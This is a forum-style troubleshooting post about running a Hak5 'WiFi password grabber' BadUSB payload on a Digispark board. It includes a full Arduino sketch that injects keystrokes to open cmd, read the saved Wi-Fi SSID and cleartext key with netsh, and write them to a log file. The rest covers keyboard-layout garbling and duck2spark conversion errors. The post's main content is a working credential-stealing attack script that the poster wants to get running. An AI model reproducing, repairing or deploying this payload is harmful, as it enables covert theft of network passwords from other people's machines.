I try to run this script on my digispark:
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---WiFi-password-grabberI just cut off the last piece (send an email and delete the log file). It has just to create the log file and thats it. Know it becomes weird:
This is the script for the Arduino IDE:
#include "DigiKeyboard.h"
void setup() {
//WiFi password grabber
}
void loop() {
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT);
DigiKeyboard.delay(1000);
DigiKeyboard.println("cmd");
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(10000);
DigiKeyboard.println("CD \"%USERPROFILE%\\DESKTOP\" & FOR /F \"TOKENS=2 DELIMS=:\" %A IN ('NETSH WLAN SHOW INTERFACE ^| FINDSTR \"SSID\" ^| FINDSTR /V \"BSSID\"') DO SET A=%A");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.println("SET A=\"%A:~1%\"");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.println("NETSH WLAN SHOW PROFILES %A% KEY=CLEAR | FINDSTR /C:\"NETWORK TYPE\" /C:\"AUTHENTICATION\" /C:\"KEY CONTENT\" | FINDSTR /V \"BROADCAST\" | FINDSTR /V \"RADIO\">>A.TXT");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.println("FOR /F \"TOKENS=3 DELIMS=: \" %A IN ('FINDSTR \"NETWORK TYPE\" A.TXT') DO SET B=%A");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.println("FOR /F \"TOKENS=2 DELIMS=: \" %A IN ('FINDSTR \"AUTHENTICATION\" A.TXT') DO SET C=%A");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.println("FOR /F \"TOKENS=3 DELIMS=: \" %A IN ('FINDSTR \"KEY CONTENT\" A.TXT') DO SET D=%A");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.println("del A.txt");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.println("echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50000);
DigiKeyboard.println("del Log.txt & exit");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
}When i flash my digispark, the first thing it does is: Press the Win-Button und Press Enter (thats correct). But it doesn't write "cmd". It writes
N )äFINDSTR ÄKEZ CONTENTÄ A.TXTä= DO SET D´%A
and Press Enter. It seems to be a weird combination of this lines:
DigiKeyboard.println("CD \"%USERPROFILE%\\DESKTOP\" & FOR /F \"TOKENS=2 DELIMS=:\" %A IN ('NETSH WLAN SHOW INTERFACE ^| FINDSTR \"SSID\" ^| FINDSTR /V \"BSSID\"') DO SET A=%A");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.println("SET A=\"%A:~1%\"");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.println("NETSH WLAN SHOW PROFILES %A% KEY=CLEAR | FINDSTR /C:\"NETWORK TYPE\" /C:\"AUTHENTICATION\" /C:\"KEY CONTENT\" | FINDSTR /V \"BROADCAST\" | FINDSTR /V \"RADIO\">>A.TXT");Now i tested the script with just the beginning part: Win, Enter, cmd, Enter:
#include "DigiKeyboard.h"
void setup() {
//WiFi password grabber
}
void loop() {
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT);
DigiKeyboard.delay(1000);
DigiKeyboard.println("cmd");
DigiKeyboard.delay(10000);
}And this works perfectly. I'm a german and use a german keyboard layout. But this can't be the error, or am i wrong? There are no chars like "Ä, Ö, Ü" and so on which could cause this problem.
Is there a DigiKeyboard library out there with a german keyboard layout? I don't really want to use duck2spark. Wih this tool, i have to convert my script everytime. With a customized library, this issue is durable fix'd. Otherwise i will write a shell script which does those steps automaticly.
Edit: Ok. Update. I copied the script from github, saved this in a file script.duck. I used the duckencoder (python version) to create my .bin file:
cat script.duck | python duckencoder.py -p -l de > inject.bin
After that, i convert it into an Arduino Sketch:
duck2spark.py -i inject.bin -l 1 -f 2000 -o sketch.ino
And my script looks now like this:
/*
* Sketch generated by duck2spark from Marcus Mengs aka MaMe82
*
*/
#include "DigiKeyboard.h"
#define DUCK_LEN 71
const PROGMEM uint8_t duckraw [DUCK_LEN] = {
0x4c, 0x61, 0x6e, 0x67, 0x75, 0x61, 0x67, 0x65, 0x20, 0x66, 0x69, 0x6c, 0x65, 0x20, 0x2f, 0x72, 0x65, 0x73, 0x6f, 0x75, 0x72, 0x63, 0x65, 0x73, 0x2f, 0x64, 0x65, 0x2e, 0x70, 0x72, 0x6f, 0x70, 0x65, 0x72, 0x74, 0x69, 0x65, 0x73, 0x20, 0x64, 0x6f, 0x65, 0x73, 0x6e, 0x27, 0x74, 0x20, 0x65, 0x78, 0x69, 0x73, 0x74, 0x20, 0x6f, 0x72, 0x20, 0x69, 0x73, 0x6e, 0x27, 0x74, 0x20, 0x72, 0x65, 0x61, 0x64, 0x61, 0x62, 0x6c, 0x65, 0xa
};
int i = 1; //how many times the payload should run (-1 for endless loop)
bool blink=true;
void setup()
{
// initialize the digital pin as an output.
pinMode(0, OUTPUT); //LED on Model B
pinMode(1, OUTPUT); //LED on Model A
DigiKeyboard.delay(2000); //wait 2000 milliseconds before first run, to give target time to initialize
}
void loop()
{
//should code be runned in this loop?
if (i != 0) {
DigiKeyboard.sendKeyStroke(0);
//parse raw duckencoder script
for (int i=0; i<DUCK_LEN; i+=2)
{
uint8_t key = pgm_read_word_near(duckraw + i);
uint8_t mod = pgm_read_word_near(duckraw + i+1);
if (key == 0) //delay (a delay>255 is split into a sequence of delays)
{
DigiKeyboard.delay(mod);
}
else DigiKeyboard.sendKeyStroke(key,mod);
}
i--;
DigiKeyboard.delay(5000); //wait 5000 milliseconds before next loop iteration
}
else if (blink)
{
digitalWrite(0, HIGH); // turn the LED on (HIGH is the voltage level)
digitalWrite(1, HIGH);
delay(100); // wait for a second
digitalWrite(0, LOW); // turn the LED off by making the voltage LOW
digitalWrite(1, LOW);
delay(100); // wait for a second
}
}Looks weird with those hex. When i try to flash my digispark i get this message:
> Starting the user app ...
>> Run error -1 has occured ...
>> Please unplug the device and restart the program.
I just look into my .bin file with the terminal and found this
root@kali:~/duck2spark-master# cat script.bin
Language file /resources/de.properties doesn't exist or isn't readable
But in my folder duck2spark-master is a subdirectory "resources" with the file de.properties. Huh.
Where is the mistake?
